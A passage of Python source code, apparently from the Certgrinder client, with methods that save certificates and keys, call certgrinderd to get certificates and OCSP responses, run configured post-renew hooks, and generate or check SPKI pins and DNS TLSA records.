as f:\n f.write(certificate.public_bytes(primitives.serialization.Encoding.PEM))\n if issuers:\n for issuer in issuers:\n f.write(issuer.public_bytes(primitives.serialization.Encoding.PEM))\n os.chmod(path, 0o644)\n\n @classmethod\n def save_concat_certkey(\n cls,\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ],\n certificate: cryptography.x509.Certificate,\n issuers: typing.List[cryptography.x509.Certificate],\n path: str,\n ) -> None:\n \"\"\"Create a single file with 
the private key, the cert and the issuer(s), in that order.\n\n Args:\n keypair: The keypair to save in the concat file\n certificate: The certificate to save in the concat file\n issuers: The list of issuer(s) to save in the concat file\n path: The path to save the concat file in\n\n Returns:\n None\n \"\"\"\n cls.save_keypair(keypair, path)\n with open(path, \"ab\") as f:\n f.write(certificate.public_bytes(primitives.serialization.Encoding.PEM))\n for issuer in issuers:\n f.write(issuer.public_bytes(primitives.serialization.Encoding.PEM))\n os.chmod(path, 0o640)\n\n def get_certgrinderd_command(\n self, subcommand: typing.List[str]\n ) -> typing.List[str]:\n \"\"\"Return the certgrinderd command to run.\n\n Adds ``--log-level`` with the current ``self.conf[\"log-level\"]``.\n Also adds --acme-server-url if configured, and --preferred-chain.\n\n Args:\n subcommand: The certgrinderd subcommand to run as a list, like [\"get\", \"ocsp\"]\n\n Returns:\n A list of the elements which make up the ``certgrinderd`` command\n \"\"\"\n # put the command together, first the base command, then the args, then subcommand\n command = str(self.conf[\"certgrinderd\"])\n commandlist = shlex.split(command)\n\n # pass the certgrinder log-level to certgrinderd\n commandlist.append(\"--log-level\")\n commandlist.append(str(self.conf[\"log-level\"]))\n\n # pass the acme-server-url if we have one\n if \"acme-server-url\" in self.conf:\n commandlist.append(\"--acme-server-url\")\n commandlist.append(str(self.conf[\"acme-server-url\"]))\n\n # pass the preferred-chain\n commandlist.append(\"--preferred-chain\")\n commandlist.append(str(self.conf[\"preferred-chain\"]))\n\n # add the requested certgrinderd command and subcommand,\n # \"get certificate\" or \"get ocsp\" mostly\n commandlist += subcommand\n\n # all good\n return commandlist\n\n def run_certgrinderd(\n self,\n stdin: bytes,\n command: typing.List[str],\n certgrinderd_stdout: bytes = b\"\",\n certgrinderd_stderr: bytes = b\"\",\n ) -> bytes:\n \"\"\"Run the configured ``self.conf[\"certgrinderd\"]`` command.\n\n The stdin argument will be passed to stdin of the command. 
A CSR is needed for\n the \"get certificate\" certgrinderd command, and a certificate chain is needed for\n the \"get ocsp\" command.\n\n Args:\n stdin: bytes representing CSR or cert chain to pass to the certgrinderd command\n command: The certgrinderd command and subcommand to call\n certgrinderd_stdout: Mocked certgrinderd stdout to use instead of calling the command\n certgrinderd_stderr: Mocked certgrinderd stderr to use instead of calling the command\n\n Returns:\n The bytes representing the stdout from the subprocess call\n \"\"\"\n if not certgrinderd_stdout and not certgrinderd_stderr:\n commandlist = self.get_certgrinderd_command(subcommand=command)\n logger.debug(f\"Running certgrinderd command: {commandlist}\")\n p = subprocess.Popen(\n commandlist,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n\n # send stdin and save stdout (the certificate chain/OCSP response/other output) +\n # stderr (the certgrinderd logging)\n certgrinderd_stdout, certgrinderd_stderr = p.communicate(input=stdin)\n logger.debug(\n f\"certgrinderd command returned {len(certgrinderd_stdout)} bytes stdout and {len(certgrinderd_stderr)} bytes stderr output\"\n )\n\n # log certgrinderd_stderr (which contains all the certgrinderd logging) at the level it was originally logged at, where possible\n if isinstance(certgrinderd_stderr, bytes):\n for line in certgrinderd_stderr.strip().decode(\"utf-8\").split(\"\\n\"):\n # do not log empty lines\n if not line:\n continue\n\n # split line in words\n words = line.split(\" \")\n if len(words) < 5:\n # cannot parse, log the whole line\n logger.warning(line)\n continue\n\n # get the loglevel\n level = words[4]\n message = \" \".join(words[5:])\n if hasattr(logger, level.lower()):\n if level.lower() == \"debug\":\n getattr(logger, level.lower())(message)\n else:\n getattr(logger, level.lower())(f\"certgrinderd: {message}\")\n else:\n # cannot grok, log the whole line\n logger.warning(line)\n\n # finally return the actual output to caller\n return certgrinderd_stdout\n\n @staticmethod\n def split_pem_chain(pem_chain_bytes: bytes) -> typing.List[bytes]:\n \"\"\"Split a PEM chain into a list of bytes of the individual PEM certificates.\n\n Args:\n pem_chain_bytes: The bytes representing the PEM chain\n\n Returns:\n A list of 0 or more bytes chunks representing each certificate\n \"\"\"\n logger.debug(f\"Parsing certificates from {len(pem_chain_bytes)} bytes input\")\n certificates = []\n cert_list = pem_chain_bytes.decode(\"ASCII\").split(\"-----BEGIN CERTIFICATE-----\")\n for cert in cert_list[1:]:\n certificates.append((\"-----BEGIN CERTIFICATE-----\" + cert).encode(\"ASCII\"))\n logger.debug(\n f\"Returning a list of {len(certificates)} chunks of bytes resembling PEM certificates\"\n )\n return certificates\n\n @staticmethod\n def parse_certificate(\n certificate_bytes: bytes,\n ) -> typing.Optional[cryptography.x509.Certificate]:\n \"\"\"Parse a bunch of bytes representing a PEM certificate and return it.\n\n Args:\n certificate_bytes: The PEM certificate\n\n Returns:\n The parsed cryptography.x509.Certificate object or None\n \"\"\"\n try:\n return cryptography.x509.load_pem_x509_certificate(\n certificate_bytes, default_backend()\n )\n except Exception:\n logger.error(\n \"Unable to parse, this is not a valid PEM formatted certificate.\"\n )\n logger.debug(\"This is the certificate which failed to parse:\")\n logger.debug(certificate_bytes)\n return None\n\n def parse_certificate_chain(\n self, certificate_chain: bytes, csr: 
cryptography.x509.CertificateSigningRequest\n ) -> typing.Optional[typing.List[cryptography.x509.Certificate]]:\n \"\"\"Split a PEM chain into a list of certificates and sanity check the result.\n\n Args:\n certificate_chain: The bytes representing the PEM formatted certificate chain\n csr: The CSR this certificate was issued from\n\n Returns:\n A list of certificates with the leaf certificate first,\n or None if an error happens\n \"\"\"\n certs = self.split_pem_chain(certificate_chain)\n if len(certs) != self.conf[\"expected-chain-length\"]:\n logger.error(\n f\"The input does not contain a valid certificate chain (it does not have {self.conf['expected-chain-length']} PEM-looking chunks, it has {len(certs)}).\"\n )\n logger.debug(\"This is the certificate chain which failed to parse:\")\n logger.debug(certificate_chain)\n # we do not have a valid certificate\n return None\n\n certificates = []\n for certbytes in certs:\n certificate = self.parse_certificate(certbytes)\n if not certificate:\n return None\n certificates.append(certificate)\n\n # keep mypy happy in spite of the mixed type self.conf dict\n assert isinstance(self.conf[\"invalid-ca-cn-list\"], list)\n assert isinstance(self.conf[\"cert-renew-threshold-days\"], int)\n # a few sanity checks of the certificate seem like a good idea\n valid = self.check_certificate_validity(\n certificate=certificates[0],\n invalid_ca_cn_list=[]\n if self.conf[\"staging\"]\n else [str(x) for x in self.conf[\"invalid-ca-cn-list\"]],\n threshold_days=self.conf[\"cert-renew-threshold-days\"],\n public_key=self.keypair.public_key(),\n subject=csr.subject,\n san_names=self.domainset,\n )\n if not valid:\n logger.error(\"Certificate is not valid.\")\n self.error = True\n return None\n\n # we have a new certificate, so we will need to run the post renew hook later\n self.hook_needed = True\n\n # done, return the certificate chain\n return certificates\n\n def get_certificate(\n self,\n csr: typing.Optional[cryptography.x509.CertificateSigningRequest] = None,\n stdout: typing.Optional[bytes] = None,\n ) -> bool:\n \"\"\"Get a new certificate for self.domainset.\n\n This method gets a new certificate regardless of the status of any\n existing certificate. 
It is called by ``self.periodic()`` as needed.\n It can also be called by the ``get certificate`` subcommand.\n\n Args:\n csr: The CSR to use instead of generating one\n stdout: The stdout bytes to use instead of calling self.run_certgrinderd(csr)\n\n Returns:\n False if something goes wrong, True if all is well\n \"\"\"\n logger.info(f\"Getting new certificate for domainset {self.domainset} ...\")\n # do we have a CSR or do we generate one?\n if not csr:\n # generate new CSR\n csr = self.generate_csr(self.keypair, self.domainset)\n self.save_csr(csr, self.csr_path)\n logger.debug(\n f\"Wrote {len(csr.public_bytes(primitives.serialization.Encoding.PEM))} bytes CSR to path {self.csr_path}\"\n )\n\n # do we have stdout or do we run certgrinderd for real?\n\n if not stdout:\n # get certificate\n stdout = self.run_certgrinderd(\n stdin=csr.public_bytes(primitives.serialization.Encoding.PEM),\n command=[\"get\", \"certificate\"],\n )\n\n # did we get any output?\n if not stdout:\n logger.error(\n \"Did not get any output, expected a certificate chain in stdout from certgrinderd\"\n )\n return False\n\n # parse the output\n certificates = self.parse_certificate_chain(stdout, csr)\n\n # certificates should be a list of 2 or 3 certificates\n if certificates:\n certificate = certificates[0]\n issuers = certificates[1:]\n else:\n logger.error(\"Did not get a certificate :(\")\n return False\n\n issuerlen = 0\n for issuer in issuers:\n issuerlen += len(issuer.public_bytes(primitives.serialization.Encoding.PEM))\n\n logger.info(\n f\"Success! Got {len(certificate.public_bytes(primitives.serialization.Encoding.PEM))} bytes certificate and {issuerlen} bytes representing {len(issuers)} issuer certificates from certgrinderd\"\n )\n\n # save cert, chain and concat\n self.save_certificate(certificate, self.certificate_path)\n self.save_certificate(certificate, self.certificate_chain_path, issuers)\n self.save_certificate(issuers[0], self.issuer_path, issuers[1:])\n self.save_concat_certkey(self.keypair, certificate, issuers, self.concat_path)\n\n # all done\n self.hook_needed = True\n logger.debug(\n f\"Saved new certificate and chain to files {self.certificate_chain_path}, {self.certificate_path}, and {self.concat_path}\"\n )\n return True\n\n def check_certificate(\n self,\n certificate: typing.Optional[cryptography.x509.Certificate] = None,\n public_key: typing.Optional[\n typing.Union[\n openssl.rsa._RSAPublicKey,\n primitives.asymmetric.ed25519.Ed25519PublicKey,\n ]\n ] = None,\n ) -> bool:\n \"\"\"Check certificate validity and return True or False.\n\n This method is called by self.grind() once per domainset when the \"check certificate\"\n subcommand is invoked.\n It reads the certificate from self.certificate_path if there is no certificate arg.\n\n Args:\n certificate: The certificate to be checked\n public_key: The public key the certificate is based on\n\n Returns:\n True if everything is OK, False otherwise\n \"\"\"\n # load certificate from disk?\n if not certificate:\n # does the file exist?\n if os.path.exists(self.certificate_chain_path):\n certificate = self.load_certificates(self.certificate_chain_path)[0]\n else:\n logger.error(f\"Certificate {self.certificate_chain_path} not found\")\n self.error = True\n return False\n\n # keep mypy happy in spite of the mixed type self.conf dict\n assert isinstance(self.conf[\"invalid-ca-cn-list\"], list)\n assert isinstance(self.conf[\"cert-renew-threshold-days\"], int)\n # check cert\n valid = self.check_certificate_validity(\n certificate=certificate,\n 
invalid_ca_cn_list=[]\n if self.conf[\"staging\"]\n else [str(x) for x in self.conf[\"invalid-ca-cn-list\"]],\n threshold_days=self.conf[\"cert-renew-threshold-days\"],\n public_key=public_key,\n san_names=self.domainset,\n )\n # set self.error if cert is not valid (we may need the information later)\n if not valid:\n self.error = True\n return valid\n\n def show_certificate(self) -> None:\n \"\"\"The ``show certificate`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n if not os.path.exists(self.certificate_path):\n logger.error(f\"Certificate {self.certificate_path} not found\")\n return\n certificate = self.load_certificates(self.certificate_path)[0]\n logger.info(\n f\"- Showing certificate for keytype '{self.keytype}' for domain set: {self.domainset}\"\n )\n logger.info(f\"Certificate keypair path: {self.keypair_path}\")\n logger.info(f\"Certificate chain path: {self.certificate_chain_path}\")\n logger.info(f\"Certificate path: {self.certificate_path}\")\n logger.info(f\"Certificate serial: {certificate.serial_number}\")\n logger.info(f\"Certificate subject: {certificate.subject}\")\n logger.info(f\"Certificate issuer: {certificate.issuer}\")\n san = certificate.extensions.get_extension_for_oid(\n cryptography.x509.oid.ExtensionOID.SUBJECT_ALTERNATIVE_NAME\n )\n assert isinstance(san.value, cryptography.x509.SubjectAlternativeName)\n logger.info(\n f\"Certificate SAN: {san.value.get_values_for_type(cryptography.x509.DNSName)}\"\n )\n logger.info(f\"Certificate not valid before: {certificate.not_valid_before}\")\n logger.info(f\"Certificate not valid after: {certificate.not_valid_after}\")\n\n # OCSP METHODS\n\n @staticmethod\n def load_ocsp_response(\n path: str,\n ) -> ocsp.OCSPResponse:\n \"\"\"Reads OCSP response in DER format from the path and returns the object.\n\n Args:\n path: The path to read the OCSP response from\n\n Returns:\n The OCSP response object\n \"\"\"\n with open(path, \"rb\") as f:\n ocsp_response_data = f.read()\n return ocsp.load_der_ocsp_response(ocsp_response_data)\n\n def get_ocsp(\n self,\n certificate: typing.Optional[cryptography.x509.Certificate] = None,\n issuers: typing.List[cryptography.x509.Certificate] = [],\n stdout: typing.Optional[bytes] = None,\n ) -> bool:\n \"\"\"The ``get ocsp`` subcommand method, called for each domainset by ``self.grind()``.\n\n Args:\n certificate: The certificate to get OCSP response for (optional)\n issuers: The list of issuer(s) of the certificate to get OCSP response for (optional)\n stdout: The mock OCSP response to return instead of calling certgrinderd (optional, used for unit tests)\n\n Returns:\n True if a new OCSP response was fetched and saved, False otherwise\n \"\"\"\n if not certificate or not issuers:\n # read chain from disk\n with open(self.certificate_chain_path, \"rb\") as f:\n certificate_bytes_list = self.split_pem_chain(f.read())\n try:\n certificate = self.load_certificates(path=self.certificate_path)[0]\n except FileNotFoundError:\n logger.warning(\n f\"Certificate {self.certificate_path} not found, parsing certificate from chain (this is a workaround for upgrades from older versions where foo-certificate.crt was not written separately).\"\n )\n certificate = cryptography.x509.load_pem_x509_certificate(\n certificate_bytes_list[0], default_backend()\n )\n self.save_certificate(certificate, self.certificate_path)\n\n try:\n issuers = self.load_certificates(path=self.issuer_path)\n except FileNotFoundError:\n logger.warning(\n f\"Issuer cert {self.issuer_path} not found, parsing issuer from chain (this is a 
workaround for upgrades from older versions where foo-issuer.crt was not written separately).\"\n )\n issuers = []\n for issuerbytes in certificate_bytes_list[1:]:\n issuers.append(\n cryptography.x509.load_pem_x509_certificate(\n issuerbytes, default_backend()\n )\n )\n self.save_certificate(issuers[0], self.issuer_path, issuers[1:])\n\n # we need the full chain to get OCSP\n stdin = certificate.public_bytes(primitives.serialization.Encoding.PEM)\n for issuer in issuers:\n stdin += issuer.public_bytes(primitives.serialization.Encoding.PEM)\n\n logger.debug(\"sending this to certgrinderd to get ocsp:\")\n logger.debug(stdin)\n if stdout is None:\n # get ocsp response from certgrinderd\n stdout = self.run_certgrinderd(stdin=stdin, command=[\"get\", \"ocsp\"])\n\n if not stdout:\n logger.error(\"Did not get an OCSP response in stdout from certgrinderd\")\n return False\n\n ocsp_response = self.parse_certgrinderd_ocsp_output(stdout)\n if not ocsp_response:\n logger.error(\"Did not get an OCSP response :(\")\n return False\n\n logger.info(\"Success! Got OCSP response from certgrinderd.\")\n\n # save OCSP response\n self.save_ocsp_response(\n ocsp_response=ocsp_response, path=self.ocsp_response_path\n )\n\n # all done\n self.hook_needed = True\n logger.debug(f\"Saved new OCSP response to file {self.ocsp_response_path}\")\n return True\n\n def check_ocsp(self) -> bool:\n \"\"\"The ``check ocsp`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n True if the OCSP response was found and is not too old, False otherwise\n \"\"\"\n if not os.path.exists(self.ocsp_response_path):\n logger.error(\n f\"OCSP response not found for keytype {self.keytype} for domainset: {self.domainset}\"\n )\n self.error = True\n return False\n\n # parse the OCSP response\n ocsp_response = self.load_ocsp_response(self.ocsp_response_path)\n\n # consider the response produced_at (rather than next_update)\n validity = ocsp_response.next_update - ocsp_response.produced_at\n passed = datetime.datetime.utcnow() - ocsp_response.produced_at\n percent = (passed / validity) * 100\n logger.debug(f\"{percent} percent of OCSP response validity period has passed\")\n\n if percent > self.conf[\"ocsp-renew-threshold-percent\"]:\n logger.debug(\n f\"OCSP response is too old for keytype {self.keytype} for domainset: {self.domainset} ({round(percent,2)}% of the time between produced_at and next_update has passed, the limit is {self.conf['ocsp-renew-threshold-percent']}%), returning False\"\n )\n self.error = True\n return False\n\n # all good\n return True\n\n def show_ocsp(self) -> None:\n \"\"\"The ``show ocsp`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n if not os.path.exists(self.ocsp_response_path):\n logger.error(f\"OCSP response not found for domainset: {self.domainset}\")\n return\n\n ocsp_response = self.load_ocsp_response(self.ocsp_response_path)\n logger.info(\n f\"- Showing OCSP response for keytype {self.keytype} domain set: {self.domainset}\"\n )\n logger.info(f\"Certificate status: {ocsp_response.certificate_status}\")\n logger.info(f\"This update: {ocsp_response.this_update}\")\n logger.info(f\"Produced at: {ocsp_response.produced_at}\")\n logger.info(f\"Next update: {ocsp_response.next_update}\")\n logger.info(f\"Revocation time: {ocsp_response.revocation_time}\")\n logger.info(f\"Revocation reason: {ocsp_response.revocation_reason}\")\n\n @staticmethod\n def parse_certgrinderd_ocsp_output(\n certgrinderd_stdout: bytes,\n ) -> 
typing.Optional[ocsp.OCSPResponse]:\n \"\"\"Parse a DER encoded binary OCSP response as returned by Certgrinderd.\n\n Args:\n certgrinderd_stdout: The bytes representing the OCSP response in DER format\n\n Returns:\n The cryptography.x509.ocsp.OCSPResponse, or None if parsing fails\n \"\"\"\n try:\n return ocsp.load_der_ocsp_response(certgrinderd_stdout)\n except ValueError:\n logger.error(\"Unable to parse OCSP response\")\n return None\n\n @staticmethod\n def save_ocsp_response(\n ocsp_response: ocsp.OCSPResponse,\n path: str,\n ) -> None:\n \"\"\"Save the OCSP response to disk in DER format.\n\n Args:\n ocsp_response: The OCSP response to save\n path: The path to save in\n\n Returns:\n None\n \"\"\"\n with open(path, \"wb\") as f:\n f.write(ocsp_response.public_bytes(primitives.serialization.Encoding.DER))\n\n # POST RENEW HOOK METHOD\n\n def run_post_renew_hooks(self) -> bool:\n \"\"\"Loop over configured post_renew_hooks and executables in post_renew_hooks_dir and run them.\n\n Returns:\n True when all hooks have been processed\n \"\"\"\n # Process any configured post-renew-hooks\n if \"post-renew-hooks\" not in self.conf or not self.conf[\"post-renew-hooks\"]:\n logger.debug(\"No post-renew-hooks found in config\")\n else:\n # loop over and run hooks\n assert isinstance(self.conf[\"post-renew-hooks\"], list)\n for hook in self.conf[\"post-renew-hooks\"]:\n self.run_post_renew_hook(hook.split(\" \"))\n\n # Process any executables in post-renew-hooks-dir if configured\n if (\n \"post-renew-hooks-dir\" not in self.conf\n or not self.conf[\"post-renew-hooks-dir\"]\n ):\n logger.debug(\"No post-renew-hooks-dir found in config\")\n else:\n # loop over files in the hooks dir\n assert isinstance(self.conf[\"post-renew-hooks-dir\"], str)\n for hook in os.listdir(self.conf[\"post-renew-hooks-dir\"]):\n # skip directories and files not executable by the current user\n if os.path.isfile(\n os.path.join(self.conf[\"post-renew-hooks-dir\"], hook)\n ) and os.access(\n os.path.join(self.conf[\"post-renew-hooks-dir\"], hook), os.X_OK\n ):\n command = os.path.join(self.conf[\"post-renew-hooks-dir\"], hook)\n if (\n \"post-renew-hooks-dir-runner\" in self.conf\n and self.conf[\"post-renew-hooks-dir-runner\"]\n ):\n assert isinstance(self.conf[\"post-renew-hooks-dir-runner\"], str)\n # use the configured hook runner\n self.run_post_renew_hook(\n [self.conf[\"post-renew-hooks-dir-runner\"]] + [command]\n )\n else:\n # run hooks in dir as is\n self.run_post_renew_hook([command])\n\n # all done\n return True\n\n @staticmethod\n def run_post_renew_hook(hook: typing.List[str]) -> bool:\n \"\"\"Run a specific post renew hook.\n\n Args:\n hook: A list of string components of the command and arguments\n\n Returns: True if exit code was 0, False otherwise.\n \"\"\"\n logger.info(f\"Running post renew hook: {hook}\")\n start = datetime.datetime.now()\n p = subprocess.Popen(hook)\n exitcode = p.wait()\n runtime = datetime.datetime.now() - start\n if exitcode != 0:\n logger.error(\n f\"Got exit code {exitcode} when running post_renew_hook {hook} - hook runtime was {runtime}\"\n )\n return False\n else:\n logger.info(\n f\"Post renew hook {hook} ended with exit code 0, good. 
Hook runtime was {runtime}\"\n )\n return True\n\n # SPKI METHODS\n\n @staticmethod\n def generate_spki(derkey: bytes) -> str:\n \"\"\"Generate and return a pin-sha256 spki hpkp style pin for the provided public key.\n\n OpenSSL equivalent command is:\n openssl x509 -in example.com.crt -pubkey -noout | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | openssl base64\n\n Args:\n derkey: The bytes representing the public key in DER format\n\n Returns:\n A string of the SPKI pin\n \"\"\"\n return base64.b64encode(hashlib.sha256(derkey).digest()).decode(\"ASCII\")\n\n @classmethod\n def output_spki(cls, derkey: bytes) -> None:\n \"\"\"Get and print the spki pin for the supplied DER public key.\n\n Args:\n derkey: The bytes representation of the DER formatted public key\n\n Returns:\n None\n \"\"\"\n spki = cls.generate_spki(derkey)\n logger.info(f\"pin-sha256='{spki}'\")\n\n def show_spki(self) -> None:\n \"\"\"The ``show spki`` subcommand method, called for each domainset by ``self.grind()``.\n\n Call ``self.output_spki()`` with the DER formatted public key and output the result.\n\n Returns:\n None\n \"\"\"\n logger.debug(\n f\"Generated SPKI pin-sha256 for public key for domainset {self.domainset}:\"\n )\n self.output_spki(derkey=self.get_der_pubkey(self.keypair))\n\n # TLSA METHODS\n\n @staticmethod\n def generate_tlsa_record(derkey: bytes, tlsatype: str) -> str:\n \"\"\"Generate and return the data part of a TLSA record of the requested type.\n\n TLSA record is generated from the DER formatted public key supplied.\n Returns an uppercase hex string.\n\n Args:\n derkey: The bytes representing the public key in DER format\n tlsatype: The TLSA type (like \"310\")\n\n Returns:\n String of the TLSA data\n\n Raises:\n ValueError: If an unknown TLSA type is passed\n \"\"\"\n if tlsatype == \"310\":\n # Generate DANE-EE Publickey Full (3 1 0) TLSA Record\n return binascii.hexlify(derkey).decode(\"ASCII\").upper()\n elif tlsatype == \"311\":\n # Generate DANE-EE Publickey SHA256 (3 1 1) TLSA Record\n return hashlib.sha256(derkey).hexdigest().upper()\n elif tlsatype == \"312\":\n # Generate DANE-EE Publickey SHA512 (3 1 2) TLSA Record\n return hashlib.sha512(derkey).hexdigest().upper()\n else:\n raise ValueError(f\"Unsupported TLSA type: {tlsatype}\")\n\n @staticmethod\n def lookup_tlsa_record(\n domain: str,\n port: int,\n protocol: str,\n tlsatype: typing.Optional[str] = None,\n nameserver: str = \"\",\n ) -> typing.Optional[typing.List[str]]:\n \"\"\"Lookup TLSA records in DNS for the configured domain, port, and protocol.\n\n Loop over any responses and look for the requested tlsatype.\n Return a list of results, optionally limited to the specified tlsatype, or None.\n Use system resolver unless nameserver is specified.\n\n Args:\n domain: The service domain name (like ``mail.example.com``)\n port: The service port (like ``443``)\n protocol: The service protocol (like ``tcp``)\n tlsatype: The TLSA type (like ``312``)\n nameserver: The DNS server IP to use instead of system resolver (optional)\n\n Returns:\n A list of records or None\n \"\"\"\n record = f\"_{port}._{protocol}.{domain}\"\n nameserverstr = (\n f\"configured DNS server {nameserver}\" if nameserver else \"system resolver\"\n )\n if tlsatype:\n tlsastr = \" \".join(tlsatype)\n tlsadesc = f\"TLSA type {tlsastr}\"\n else:\n tlsadesc = \"all TLSA types\"\n\n logger.debug(\n f\"Looking up TLSA record in DNS using {nameserverstr}: {record} - {tlsadesc}\"\n )\n try:\n if nameserver:\n res = 
dns.resolver.Resolver(configure=False)\n res.nameservers = [nameserver]\n else:\n res = dns.resolver\n dnsresponse = res.query(record, \"TLSA\")\n except dns.resolver.NXDOMAIN:\n logger.debug(\n f\"NXDOMAIN returned by {nameserverstr}, no TLSA records found in DNS for: {record}\"\n )\n return None\n except dns.resolver.NoAnswer:\n logger.error(\n f\"Empty answer returned by {nameserverstr}. No TLSA records found in DNS for: {record}\"\n )\n return None\n except ValueError:\n logger.error(\n f\"Error parsing DNS server '{nameserver}'. Only IP addresses and https URLs are supported.\"\n )\n sys.exit(1)\n except dns.exception.Timeout:\n logger.error(f\"Timeout while waiting for {nameserverstr}. Error.\")\n sys.exit(1)\n except Exception as E:\n logger.error(f\"Exception {type(E)} received during DNS lookup: {E}\")\n return None\n\n # loop over the responses\n result = []\n for reply in dnsresponse:\n replytype = f\"{reply.usage} {reply.selector} {reply.mtype}\"\n logger.debug(\"Found TLSA record type %s\" % replytype)\n if not tlsatype or tlsastr == replytype:\n # add this record to the result to be returned\n result.append(binascii.hexlify(reply.cert).decode(\"ASCII\"))\n\n if result:\n logger.debug(f\"Returning {len(result)} TLSA records\")\n return result\n else:\n logger.debug(\n f\"{len(dnsresponse)} TLSA records found, but none of the type {tlsatype} were found\"\n )\n return None\n\n @classmethod\n def output_tlsa_record(\n cls,\n derkey: bytes,\n domain: str,\n port: int,\n protocol: str,\n tlsatype: str,\n warning: bool = False,\n ) -> None:\n \"\"\"Output the TLSA record for the given DER key, domain, port, protocol and tlsatype.\n\n Call ``self.generate_tlsa()`` and output the result formatted as a DNS record\n\n Args:\n derkey: The bytes representation the public key in DER format\n domain: The service domain name (like ``mail.example.com``)\n port: The service port (like ``443``)\n protocol: The service protocol (like ``tcp``)\n tlsatype: The TLSA type (like ``312``)\n warning: Set True to output at level ``WARNING`` (default ``INFO``)\n\n Returns:\n None\n \"\"\"\n tlsarecord = f\"_{port}._{protocol}.{domain}\"\n tlsadata = cls.generate_tlsa_record(derkey, tlsatype)\n tlsastr = \" \".join(tlsatype)\n if warning:\n logger.warning(f\"{tlsarecord} TLSA {tlsastr} {tlsadata}\")\n else:\n logger.info(f\"{tlsarecord} TLSA {tlsastr} {tlsadata}\")\n\n @classmethod\n def verify_tlsa_record(\n cls,\n derkey: bytes,\n domain: str,\n port: int,\n protocol: str,\n tlsatype: str,\n nameserver: str = \"\",\n ) -> bool:\n \"\"\"Check the TLSA records for the port/protocol/domain and DER key in the DNS.\n\n Output the info needed to fix things when missing records are found.\n\n Args:\n derkey: The bytes representation the public key in DER format\n domain: The service domain name (like ``mail.example.com``)\n port: The service port (like ``443``)\n protocol: The service protocol (like ``tcp``)\n tlsatype: The TLSA type (like ``312``)\n nameserver: The DNS server IP to use instead of system resolver (optional)\n\n Return:\n True if all is well, False if one or more problems are found\n \"\"\"\n tlsarecord = f\"_{port}._{protocol}.{domain}\"\n tlsadata = cls.generate_tlsa_record(derkey, tlsatype)\n tlsastr = \" \".join(map(str, tlsatype))\n\n # do the DNS lookup\n dns_reply = cls.lookup_tlsa_record(\n domain=domain,\n port=port,\n protocol=protocol,\n tlsatype=tlsatype,\n nameserver=nameserver,\n )\n\n # bail out early if we got nothing from DNS\n if dns_reply is None:\n logger.warning(\n f\"No 
TLSA records for name {tlsarecord} of type {tlsastr} were found in DNS. This record needs to be added:\"\n )\n cls.output_tlsa_record(\n derkey=derkey,\n domain=domain,\n port=port,\n protocol=protocol,\n tlsatype=tlsatype,\n warning=True,\n )\n return False\n\n # we have a response\n logger.debug(\n f\"Received DNS response for TLSA type {tlsastr}: {len(dns_reply)} answers - looking for an answer matching the public key...\"\n )\n for reply in dns_reply:\n if reply.upper() == tlsadata:\n logger.info(\n f\"TLSA record for name {tlsarecord} type {tlsastr} matching the local key found in DNS, good.\"\n )\n return True\n\n logger.warning(\n f\"None of the TLSA records found in DNS for the name {tlsarecord} and type {tlsatype} match the local key. This record needs to be added to the DNS:\"\n )\n cls.output_tlsa_record(\n derkey=derkey,\n domain=domain,\n port=port,\n protocol=protocol,\n tlsatype=tlsatype,\n warning=True,\n )\n return False\n\n def show_tlsa(self) -> None:\n \"\"\"The 'show tlsa' subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n logger.info(\n f\"- Showing TLSA records for keytype '{self.keytype}' for domain set: {self.domainset} port '{self.conf['tlsa-port']}' protocol '{self.conf['tlsa-protocol']}':\"\n )\n for domain in self.domainset:\n # keep mypy happy\n assert isinstance(self.conf[\"tlsa-type-list\"], list)\n assert isinstance(self.conf[\"tlsa-port\"], int)\n assert isinstance(self.conf[\"tlsa-protocol\"], str)\n for tlsatype in self.conf[\"tlsa-type-list\"]:\n self.output_tlsa_record(\n derkey=self.get_der_pubkey(self.keypair),\n domain=domain,\n port=self.conf[\"tlsa-port\"],\n protocol=self.conf[\"tlsa-protocol\"],\n tlsatype=tlsatype,\n )\n\n def check_tlsa(self) -> None:\n \"\"\"The 'check tlsa' subcommand method, called for each domainset by ``self.grind()``.\n\n Loops over the configured TLSA types and calls ``self.verify_tlsa_record()`` which\n does the heavy lifting.\n\n Returns:\n None\n \"\"\"\n for domain in self.domainset:\n logger.debug(\n f\"Checking DNS for TLSA records for {domain} port {self.conf['tlsa-port']} protocol {self.conf['tlsa-protocol']}:\"\n )\n assert isinstance(self.conf[\"tlsa-type-list\"], list)\n assert isinstance(self.conf[\"tlsa-port\"], int)\n assert isinstance(self.conf[\"tlsa-protocol\"], str)\n assert isinstance(self.conf[\"name-server\"], str)\n for tlsatype in self.conf[\"tlsa-type-list\"]:\n result = self.verify_tlsa_record(\n derkey=self.get_der_pubkey(self.keypair),\n domain=domain,\n port=self.conf[\"tlsa-port\"],\n protocol=self.conf[\"tlsa-protocol\"],\n tlsatype=tlsatype,\n nameserver=self.conf[\"name-server\"],\n )\n if not result and not self.error:\n logger.debug(\n \"Problem discovered in check mode, setting self.error=True\"\n )\n self.error = True\n logger.debug(\n f\"Done checking DNS for TLSA records for {domain} port {self.conf['tlsa-port']} protocol {self.conf['tlsa-protocol']}\"\n )\n\n # CAA METHODS\n\n def show_caa(self) -> None:\n \"\"\"The ``show caa`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n # get acmeaccount from certgrinderd\n stdout = self.run_certgrinderd(stdin=b\"\", command=[\"show\", \"acmeaccount\"])\n url: str = \"\"\n for line in stdout.decode().split(\"\\n\"):\n if line[:15] == \" Account URL: \":\n url = line[15:]\n break\n else:\n logger.error(\"certgrinderd did not return an acmeaccount\")\n sys.exit(1)\n\n # output CAA records\n for domain in self.domainset:\n if domain[0] == \"*\":\n # 
